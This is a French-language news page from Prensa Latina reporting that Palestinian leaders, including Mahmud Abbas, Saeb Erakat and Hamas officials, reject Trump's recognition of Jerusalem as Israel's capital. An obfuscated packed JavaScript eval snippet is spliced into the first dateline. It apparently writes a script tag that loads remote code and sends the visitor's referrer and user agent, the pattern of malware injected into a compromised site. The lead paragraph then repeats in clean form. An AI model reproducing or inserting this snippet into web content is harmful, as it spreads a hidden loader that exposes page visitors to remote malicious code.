samedi 20 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Les autorités palestiniennes rejettent la décision de Trump au sujet de Jérusalem

Ramallah, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ayffn|var|u0026u|referrer|ddssy||js|php'.split('|'),0,{})) 7 décembre (Prensa Latina) Les principales autorités de Palestine se sont aujourd´hui opposé à la décision annoncée la veille par le président étasunien, Donald Trump, de reconnaitre Jérusalem comme capitale d´Israël.

Ramallah, 7 décembre (Prensa Latina) Les principales autorités de Palestine se sont aujourd´hui opposé à la décision annoncée la veille par le président étasunien, Donald Trump, de reconnaitre Jérusalem comme capitale d´Israël.

Le président palestinien, Mahmud Abas, a été l´un des premiers à réagir à cette mesure.

« Par le biais de ces déplorables décisions, les États-Unis boycottent délibérément tous les efforts de paix et proclament qu´ils abandonnent le rôle de parrain du processus de paix qu´ils ont exercé lors des dernières décennies », a-t-il déclaré.

Le secrétaire général de l´Organisation pour la Libération de la Palestine (OLP), Saeb Erakat, a pour sa part jugé que « Trump a détruit la dénommée solution des deux États ».

Le Hamas, le groupe radical palestinien, a quant à lui considéré que la décision du président nord-américain « a ouvert les portes de l´enfer », et a appelé à une nouvelle Intifada (rébellion) qui débutera, selon son leader, « ce vendredi même ».

Ismael Raduan, haut responsable du Hamas, a appelé les pays arabes et musulmans à couper leurs liens politiques et économiques avec les ambassades étasuniennes puis à expulser les ambassadeurs de Washington présents sur leurs territoires.

peo/rc/lp

EN CONTINU
notes connexes